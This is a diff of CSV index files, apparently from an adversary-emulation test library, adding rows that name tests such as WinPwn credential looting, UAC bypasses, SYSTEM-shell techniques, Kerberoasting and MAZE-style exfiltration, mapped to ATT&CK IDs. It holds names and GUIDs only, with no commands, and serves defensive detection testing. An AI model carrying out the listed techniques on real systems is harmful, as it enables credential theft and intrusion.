 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -884,6 +933,8 @@ discovery,T1083,File and Directory Discovery,4,Nix File and Directory Discovery
 discovery,T1083,File and Directory Discovery,5,Simulating MAZE Directory Enumeration,c6c34f61-1c3e-40fb-8a58-d017d88286d8,powershell
 discovery,T1615,Group Policy Discovery,1,Display group policy information via gpresult,0976990f-53b1-4d3f-a185-6df5be429d3b,command_prompt
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
+discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
+discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
@@ -904,6 +955,10 @@ discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257
 discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
 discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
 discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
+discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
+discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
+discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
+discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
 discovery,T1135,Network Share Discovery,1,Network Share Discovery,f94b5ad9-911c-4eff-9718-fd21899db4f7,sh
 discovery,T1135,Network Share Discovery,2,Network Share Discovery - linux,875805bc-9e86-4e87-be86-3a5527315cae,bash
 discovery,T1135,Network Share Discovery,3,Network Share Discovery command prompt,20f1097d-81c1-405c-8380-32174d493bbb,command_prompt
@@ -911,10 +966,13 @@ discovery,T1135,Network Share Discovery,4,Network Share Discovery PowerShell,1b0
 discovery,T1135,Network Share Discovery,5,View available share drives,ab39a04f-0c93-4540-9ff2-83f862c385ae,command_prompt
 discovery,T1135,Network Share Discovery,6,Share Discovery with PowerView,b1636f0a-ba82-435c-b699-0d78794d8bfd,powershell
 discovery,T1135,Network Share Discovery,7,PowerView ShareFinder,d07e4cc1-98ae-447e-9d31-36cb430d28c4,powershell
+discovery,T1135,Network Share Discovery,8,WinPwn - shareenumeration,987901d1-5b87-4558-a6d9-cffcabc638b8,powershell
 discovery,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
 discovery,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash
 discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+discovery,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
+discovery,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
 discovery,T1201,Password Policy Discovery,1,Examine password complexity policy - Ubuntu,085fe567-ac84-47c7-ac4c-2688ce28265b,bash
 discovery,T1201,Password Policy Discovery,2,Examine password complexity policy - CentOS/RHEL 7.x,78a12e65-efff-4617-bc01-88f17d71315d,bash
 discovery,T1201,Password Policy Discovery,3,Examine password complexity policy - CentOS/RHEL 6.x,6ce12552-0adb-4f56-89ff-95ce268f6358,bash
@@ -925,6 +983,7 @@ discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7f
 discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
 discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
+discovery,T1120,Peripheral Device Discovery,2,WinPwn - printercheck,cb6e76ca-861e-4a7f-be08-564caa3e6f75,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1057,Process Discovery,3,Process Discovery - Get-Process,3b3809b6-a54b-4f5b-8aff-cb51f2e97b34,powershell
@@ -959,6 +1018,9 @@ discovery,T1518.001,Security Software Discovery,6,Security Software Discovery -
 discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
 discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
 discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
+discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
+discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
+discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
 discovery,T1497.001,System Checks,1,Detect Virtualization Environment (Linux),dfbd1a21-540d-4574-9731-e852bd6fe840,sh
 discovery,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell
 discovery,T1497.001,System Checks,3,Detect Virtualization Environment (MacOS),a960185f-aef6-4547-8350-d1ce16680d09,sh
@@ -975,6 +1037,16 @@ discovery,T1082,System Information Discovery,9,Griffon Recon,69bd4abe-8759-49a6-
 discovery,T1082,System Information Discovery,10,Environment variables discovery on windows,f400d1c0-1804-4ff8-b069-ef5ddd2adbf3,command_prompt
 discovery,T1082,System Information Discovery,11,Environment variables discovery on macos and linux,fcbdd43f-f4ad-42d5-98f3-0218097e2720,sh
 discovery,T1082,System Information Discovery,12,Show System Integrity Protection status (MacOS),327cc050-9e99-4c8e-99b5-1d15f2fb6b96,sh
+discovery,T1082,System Information Discovery,13,WinPwn - winPEAS,eea1d918-825e-47dd-acc2-814d6c58c0e1,powershell
+discovery,T1082,System Information Discovery,14,WinPwn - itm4nprivesc,3d256a2f-5e57-4003-8eb6-64d91b1da7ce,powershell
+discovery,T1082,System Information Discovery,15,WinPwn - Powersploits privesc checks,345cb8e4-d2de-4011-a580-619cf5a9e2d7,powershell
+discovery,T1082,System Information Discovery,16,WinPwn - General privesc checks,5b6f39a2-6ec7-4783-a5fd-2c54a55409ed,powershell
+discovery,T1082,System Information Discovery,17,WinPwn - GeneralRecon,7804659b-fdbf-4cf6-b06a-c03e758590e8,powershell
+discovery,T1082,System Information Discovery,18,WinPwn - Morerecon,3278b2f6-f733-4875-9ef4-bfed34244f0a,powershell
+discovery,T1082,System Information Discovery,19,WinPwn - RBCD-Check,dec6a0d8-bcaf-4c22-9d48-2aee59fb692b,powershell
+discovery,T1082,System Information Discovery,20,WinPwn - PowerSharpPack - Watson searching for missing windows patches,07b18a66-6304-47d2-bad0-ef421eb2e107,powershell
+discovery,T1082,System Information Discovery,21,WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors,efb79454-1101-4224-a4d0-30c9c8b29ffc,powershell
+discovery,T1082,System Information Discovery,22,WinPwn - PowerSharpPack - Seatbelt,5c16ceb4-ba3a-43d7-b848-a13c1f216d95,powershell
 discovery,T1614.001,System Language Discovery,1,Discover System Language by Registry Query,631d4cf1-42c9-4209-8fe9-6bd4de9421be,command_prompt
 discovery,T1614.001,System Language Discovery,2,Discover System Language with chcp,d91473ca-944e-477a-b484-0e80217cd789,command_prompt
 discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows,970ab6a1-0157-4f3f-9a73-ec4166754b23,command_prompt
@@ -1023,7 +1095,11 @@ execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d
 execution,T1204.002,Malicious File,7,Headless Chrome code execution via VBA,a19ee671-ed98-4e9d-b19c-d1954a51585a,powershell
 execution,T1204.002,Malicious File,8,Potentially Unwanted Applications (PUA),02f35d62-9fdc-4a97-b899-a5d9a876d295,powershell
 execution,T1204.002,Malicious File,9,Office Generic Payload Download,5202ee05-c420-4148-bf5e-fd7f7d24850c,powershell
+execution,T1204.002,Malicious File,10,LNK Payload Download,581d7521-9c4b-420e-9695-2aec5241167f,powershell
 execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
+execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
+execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
+execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
 execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
 execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
 execution,T1059.001,PowerShell,3,Run Bloodhound from Memory using Download Cradle,bf8c1441-4674-4dab-8e4e-39d93d08f9b7,powershell
@@ -1128,6 +1204,8 @@ command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD
 command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
+command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
 command-and-control,T1090.001,Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -1168,6 +1246,7 @@ exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
 exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
+exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
 exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
 initial-access,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
 initial-access,T1078.001,Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
@@ -1175,6 +1254,8 @@ initial-access,T1078.001,Default Accounts,2,Activate Guest Account,aa6cb8c4-b582
 initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
 initial-access,T1078.003,Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
+initial-access,T1078.003,Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
+initial-access,T1078.003,Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
 initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
 initial-access,T1566.001,Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
 initial-access,T1566.001,Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell

atomics/Indexes/Indexes-CSV/linux-index.csv

@@ -9,6 +9,7 @@ credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes ser
 credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
+credential-access,T1555.003,Credentials from Web Browsers,9,LaZagne.py - Dump Credentials from Firefox Browser,87e88698-621b-4c45-8a89-4eaebdeaabb1,sh
 credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
 credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
 credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh

atomics/Indexes/Indexes-CSV/macos-index.csv

@@ -5,6 +5,7 @@ credential-access,T1552.001,Credentials In Files,1,Extract Browser and System cr
 credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
 credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
 credential-access,T1555.003,Credentials from Web Browsers,2,Search macOS Safari Cookies,c1402f7b-67ca-43a8-b5f3-3143abedc01b,sh
+credential-access,T1555.003,Credentials from Web Browsers,14,Simulating Access to Chrome Login Data - MacOS,124e13e5-d8a1-4378-a6ee-a53cd0c7e369,sh
 credential-access,T1056.002,GUI Input Capture,1,AppleScript - Prompt User for Password,76628574-0bc1-4646-8fe2-8f4427b47d15,bash
 credential-access,T1555.001,Keychain,1,Keychain,1864fdec-ff86-4452-8c30-f12507582a93,sh
 credential-access,T1040,Network Sniffing,2,Packet Capture macOS,9d04efee-eff5-4240-b8d2-07792b873608,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1,15 +1,25 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 credential-access,T1558.004,AS-REP Roasting,1,Rubeus asreproast,615bd568-2859-41b5-9aed-61f6a88e48dd,powershell
 credential-access,T1558.004,AS-REP Roasting,2,Get-DomainUser with PowerView,d6139549-7b72-4e48-9ea1-324fc9bdf88a,powershell
+credential-access,T1558.004,AS-REP Roasting,3,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,8c385f88-4d47-4c9a-814d-93d9deec8c71,powershell
 credential-access,T1003.005,Cached Domain Credentials,1,Cached Credential Dump via Cmdkey,56506854-89d6-46a3-9804-b7fde90791f9,command_prompt
 credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell
 credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell
 credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt
+credential-access,T1552.001,Credentials In Files,6,WinPwn - sensitivefiles,114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0,powershell
+credential-access,T1552.001,Credentials In Files,7,WinPwn - Snaffler,fdd0c913-714b-4c13-b40f-1824d6c015f2,powershell
+credential-access,T1552.001,Credentials In Files,8,WinPwn - powershellsensitive,75f66e03-37d3-4704-9520-3210efbe33ce,powershell
+credential-access,T1552.001,Credentials In Files,9,WinPwn - passhunt,00e3e3c7-6c3c-455e-bd4b-461c7f0e7797,powershell
+credential-access,T1552.001,Credentials In Files,10,WinPwn - SessionGopher,c9dc9de3-f961-4284-bd2d-f959c9f9fda5,powershell
+credential-access,T1552.001,Credentials In Files,11,"WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials",aaa87b0e-5232-4649-ae5c-f1724a4b2798,powershell
 credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell
 credential-access,T1555,Credentials from Password Stores,2,Dump credentials from Windows Credential Manager With PowerShell [windows Credentials],c89becbe-1758-4e7d-a0f4-97d2188a23e3,powershell
 credential-access,T1555,Credentials from Password Stores,3,Dump credentials from Windows Credential Manager With PowerShell [web Credentials],8fd5a296-6772-4766-9991-ff4e92af7240,powershell
 credential-access,T1555,Credentials from Password Stores,4,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials],36753ded-e5c4-4eb5-bc3c-e8fba236878d,powershell
 credential-access,T1555,Credentials from Password Stores,5,Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials],bc071188-459f-44d5-901a-f8f2625b2d2e,powershell
+credential-access,T1555,Credentials from Password Stores,6,WinPwn - Loot local Credentials - lazagne,079ee2e9-6f16-47ca-a635-14efcd994118,powershell
+credential-access,T1555,Credentials from Password Stores,7,WinPwn - Loot local Credentials - Wifi Credentials,afe369c2-b42e-447f-98a3-fb1f4e2b8552,powershell
+credential-access,T1555,Credentials from Password Stores,8,WinPwn - Loot local Credentials - Decrypt Teamviewer Passwords,db965264-3117-4bad-b7b7-2523b7856b92,powershell
 credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell
 credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt
 credential-access,T1555.003,Credentials from Web Browsers,4,Simulating access to Chrome Login Data,3d111226-d09a-4911-8715-fe11664f960d,powershell
@@ -17,11 +27,16 @@ credential-access,T1555.003,Credentials from Web Browsers,5,Simulating access to
 credential-access,T1555.003,Credentials from Web Browsers,6,Simulating access to Windows Firefox Login Data,eb8da98a-2e16-4551-b3dd-83de49baa14c,powershell
 credential-access,T1555.003,Credentials from Web Browsers,7,Simulating access to Windows Edge Login Data,a6a5ec26-a2d1-4109-9d35-58b867689329,powershell
 credential-access,T1555.003,Credentials from Web Browsers,8,Decrypt Mozilla Passwords with Firepwd.py,dc9cd677-c70f-4df5-bd1c-f114af3c2381,powershell
+credential-access,T1555.003,Credentials from Web Browsers,10,Stage Popular Credential Files for Exfiltration,f543635c-1705-42c3-b180-efd6dc6e7ee7,powershell
+credential-access,T1555.003,Credentials from Web Browsers,11,WinPwn - BrowserPwn,764ea176-fb71-494c-90ea-72e9d85dce76,powershell
+credential-access,T1555.003,Credentials from Web Browsers,12,WinPwn - Loot local Credentials - mimi-kittenz,ec1d0b37-f659-4186-869f-31a554891611,powershell
+credential-access,T1555.003,Credentials from Web Browsers,13,WinPwn - PowerSharpPack - Sharpweb for Browser Credentials,e5e3d639-6ea8-4408-9ecd-d5a286268ca0,powershell
 credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt
 credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt
 credential-access,T1003.006,DCSync,1,DCSync (Active Directory),129efd28-8497-4c87-a1b0-73b9a870ca3e,command_prompt
 credential-access,T1003.006,DCSync,2,Run DSInternals Get-ADReplAccount,a0bced08-3fc5-4d8b-93b7-e8344739376e,powershell
 credential-access,T1187,Forced Authentication,1,PetitPotam,485ce873-2e65-4706-9c7e-ae3ab9e14213,powershell
+credential-access,T1187,Forced Authentication,2,WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS,7f06b25c-799e-40f1-89db-999c9cc84317,powershell
 credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell
 credential-access,T1558.001,Golden Ticket,1,Crafting Active Directory golden tickets with mimikatz,9726592a-dabc-4d4d-81cd-44070008b3af,powershell
 credential-access,T1558.001,Golden Ticket,2,Crafting Active Directory golden tickets with Rubeus,e42d33cd-205c-4acf-ab59-a9f38f6bad9c,powershell
@@ -32,6 +47,8 @@ credential-access,T1558.003,Kerberoasting,2,Rubeus kerberoast,14625569-6def-4497
 credential-access,T1558.003,Kerberoasting,3,Extract all accounts in use as SPN using setspn,e6f4affd-d826-4871-9a62-6c9004b8fe06,command_prompt
 credential-access,T1558.003,Kerberoasting,4,Request A Single Ticket via PowerShell,988539bc-2ed7-4e62-aec6-7c5cf6680863,powershell
 credential-access,T1558.003,Kerberoasting,5,Request All Tickets via PowerShell,902f4ed2-1aba-4133-90f2-cff6d299d6da,powershell
+credential-access,T1558.003,Kerberoasting,6,WinPwn - Kerberoasting,78d10e20-c874-45f2-a9df-6fea0120ec27,powershell
+credential-access,T1558.003,Kerberoasting,7,WinPwn - PowerSharpPack - Kerberoasting Using Rubeus,29094950-2c96-4cbd-b5e4-f7c65079678f,powershell
 credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell
 credential-access,T1557.001,LLMNR/NBT-NS Poisoning and SMB Relay,1,LLMNR Poisoning with Inveigh (PowerShell),deecd55f-afe0-4a62-9fba-4d1ba2deb321,powershell
 credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt
@@ -57,6 +74,8 @@ credential-access,T1003.003,NTDS,7,Create Volume Shadow Copy with Powershell,542
 credential-access,T1003.003,NTDS,8,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt
 credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt
 credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
+credential-access,T1040,Network Sniffing,5,Windows Internal pktmon capture,c67ba807-f48b-446e-b955-e4928cd1bf91,command_prompt
+credential-access,T1040,Network Sniffing,6,Windows Internal pktmon set filter,855fb8b4-b8ab-4785-ae77-09f5df7bff55,command_prompt
 credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt
 credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell
 credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell
@@ -67,6 +86,7 @@ credential-access,T1110.001,Password Guessing,2,Brute Force Credentials of singl
 credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt
 credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell
 credential-access,T1110.003,Password Spraying,3,Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos),f14d956a-5b6e-4a93-847f-0c415142f07d,powershell
+credential-access,T1110.003,Password Spraying,5,WinPwn - DomainPasswordSpray Attacks,5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82,powershell
 credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt
 credential-access,T1552.004,Private Keys,6,ADFS token signing and encryption certificates theft - Local,78e95057-d429-4e66-8f82-0f060c1ac96f,powershell
 credential-access,T1552.004,Private Keys,7,ADFS token signing and encryption certificates theft - Remote,cab413d8-9e4a-4b8d-9b84-c985bd73a442,powershell
@@ -76,10 +96,12 @@ credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90
 credential-access,T1003.002,Security Account Manager,4,PowerDump Hashes and Usernames from Registry,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell
 credential-access,T1003.002,Security Account Manager,5,dump volume shadow copy hives with certutil,eeb9751a-d598-42d3-b11c-c122d9c3f6c7,powershell
 credential-access,T1003.002,Security Account Manager,6,dump volume shadow copy hives with System.IO.File,9d77fed7-05f8-476e-a81b-8ff0472c64d0,powershell
+credential-access,T1003.002,Security Account Manager,7,WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes,0c0f5f06-166a-4f4d-bb4a-719df9a01dbb,powershell
 credential-access,T1558.002,Silver Ticket,1,Crafting Active Directory silver tickets with mimikatz,385e59aa-113e-4711-84d9-f637aef01f2c,powershell
 credential-access,T1539,Steal Web Session Cookie,1,Steal Firefox Cookies (Windows),4b437357-f4e9-4c84-9fa6-9bcee6f826aa,powershell
 credential-access,T1539,Steal Web Session Cookie,2,Steal Chrome Cookies (Windows),26a6b840-4943-4965-8df5-ef1f9a282440,powershell
 credential-access,T1555.004,Windows Credential Manager,1,Access Saved Credentials via VaultCmd,9c2dd36d-5c8b-4b29-8d72-a11b0d5d7439,command_prompt
+credential-access,T1555.004,Windows Credential Manager,2,WinPwn - Loot local Credentials - Invoke-WCMDump,fa714db1-63dd-479e-a58e-7b2b52ca5997,powershell
 collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell
 collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt
 collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt
@@ -133,6 +155,10 @@ privilege-escalation,T1548.002,Bypass User Account Control,14,UACME Bypass Metho
 privilege-escalation,T1548.002,Bypass User Account Control,15,UACME Bypass Method 56,235ec031-cd2d-465d-a7ae-68bab281e80e,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,16,UACME Bypass Method 59,dfb1b667-4bb8-4a63-a85e-29936ea75f29,command_prompt
 privilege-escalation,T1548.002,Bypass User Account Control,17,UACME Bypass Method 61,7825b576-744c-4555-856d-caf3460dc236,command_prompt
+privilege-escalation,T1548.002,Bypass User Account Control,18,WinPwn - UAC Magic,964d8bf8-37bc-4fd3-ba36-ad13761ebbcc,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,19,WinPwn - UAC Bypass ccmstp technique,f3c145f9-3c8d-422c-bd99-296a17a8f567,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,20,WinPwn - UAC Bypass DiskCleanup technique,1ed67900-66cd-4b09-b546-2a0ef4431a0c,powershell
+privilege-escalation,T1548.002,Bypass User Account Control,21,WinPwn - UAC Bypass DccwBypassUAC technique,2b61977b-ae2d-4ae4-89cb-5c36c89586be,powershell
 privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell
 privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell
